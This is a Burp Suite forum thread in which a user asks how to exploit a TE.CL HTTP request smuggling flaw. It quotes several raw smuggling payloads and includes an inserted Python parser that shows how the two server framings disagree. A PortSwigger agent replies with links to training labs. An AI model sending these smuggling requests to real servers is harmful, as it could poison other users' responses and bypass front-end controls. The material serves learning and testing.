Burp Suite User Forum

HTTP Request Smuggling POST Request with Body

Wyatt | Last updated: May 28, 2020 04:25PM UTC

Hi Portswigger Team,

I have identified a potential TE.CL HTTP Request Smuggling vulnerability through Burp Suite's scanner and can verify it with the HTTP Request Smuggler extension. I'm having difficulty exploiting it and am looking for guidance on how to smuggle my POST data in a request. The example online (https://portswigger.net/web-security/request-smuggling) shows a POST request without a body being sent:

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

--

The differential response portion starts with a POST request without a body and then smuggles a GET request:

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

--

I'm struggling to create a proof of concept where two POST requests with data are sent, where each has a body. The HTTP Request Smuggler identifies two requests that are subject to smuggling:

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-Length: 23
Transfer-Encoding: chunked

d
{"foo":"bar"}
0

---

And

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-Length: 24
Transfer-Encoding: chunked

d
{"foo":"bar"}
0
X

--

This format indicates to me that this is TE.CL. When I click Smuggle Attack (TE.CL) on the request, the Turbo Intruder payload will replace '0\r\n\r\n' with the hexadecimal size of the smuggled request plus the prefix and then finally '\r\n0\r\n\r\n'.

For example, if I want to smuggle the following request, my prefix variable is set to:

'''POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-Length: 13

{"foo":"foo"}'''

This ends up creating an attack request that looks like the following:

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-length: 22
Transfer-Encoding: chunked

d
{"foo":"bar"}
78
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-Length: 13

{"foo":"foo"}
0

---

My expectation is that if request smuggling works, one of the poisoned responses would return the data for {"foo":"foo"} instead of {"foo":"bar"}. I'm unfortunately getting a 400 response when I try to send data along with an additional POST request with data. Is it possible to smuggle POST data along with an additional POST request? Are my content-length or chunked counts incorrect?
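The two framings carried by the attack request above, parsed separately, as an added example that is not code from the post or from PortSwigger: RAW is constructed from the attack request quoted above, and the Content-Length-only and chunked-only parsers are minimal stand-ins for a front end and a back end that disagree. desync_report() returns what each side takes as the body, what each leaves on the connection, and what a Content-Length back end still has unread once it has consumed the smuggled request.

```python
# Added example, not code from the post or from PortSwigger. RAW is constructed
# from the attack request quoted above; CRLF line endings are what the counts cover.
SMUGGLED = (
    b"POST /search HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
    b"Content-Type: application/json\r\nContent-Length: 13\r\n\r\n{\"foo\":\"foo\"}"
)
RAW = (
    b"POST /search HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
    b"Content-Type: application/json\r\nContent-length: 22\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"d\r\n{\"foo\":\"bar\"}\r\n" + b"%x\r\n" % len(SMUGGLED) + SMUGGLED + b"\r\n0\r\n\r\n"
)

def split_headers(raw):
    """Return ({lower-cased name: value}, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # [0] is the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest

def ambiguous_framing(headers):
    """Both headers present: the check a proxy should make, and refuse to forward on."""
    return b"content-length" in headers and b"transfer-encoding" in headers

def body_by_cl(headers, rest):
    """Body for a server honouring only Content-Length, plus the bytes left on the connection."""
    n = int(headers[b"content-length"])
    return rest[:n], rest[n:]

def body_by_te(rest):
    """Same split for a server honouring only Transfer-Encoding: chunked."""
    body, pos = b"", 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:                                 # last-chunk, then empty trailer
            return body, rest[rest.index(b"\r\n", pos) + 2:]
        body += rest[pos:pos + size]
        pos += size + 2                               # chunk data plus its CRLF

def desync_report(raw):
    headers, rest = split_headers(raw)
    cl_body, cl_left = body_by_cl(headers, rest)
    te_body, te_left = body_by_te(rest)
    h2, rest2 = split_headers(cl_left)      # a CL back end reads its leftover as a new request
    tail = body_by_cl(h2, rest2)[1] if b"content-length" in h2 else rest2
    return {"ambiguous": ambiguous_framing(headers), "cl_body": cl_body,
            "cl_leftover": cl_left, "te_body": te_body, "te_leftover": te_left,
            "tail": tail}                   # what remains after that request, for a third
```

Call desync_report(RAW) and compare cl_leftover with te_leftover: the chunked parser consumes the whole stream, while the Content-Length parser stops after 22 bytes, and the tail entry is the end of the chunked envelope that no longer forms a valid request on its own.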

Michelle, PortSwigger Agent | Last updated: May 29, 2020 08:10AM UTC

You might find some of the information on the Web Security Academy helpful: https://portswigger.net/web-security/request-smuggling. There are quite a few labs to try out, and the solutions for the labs are included, so it might help to have a go at solving these labs and then use those examples to help work on your own requests.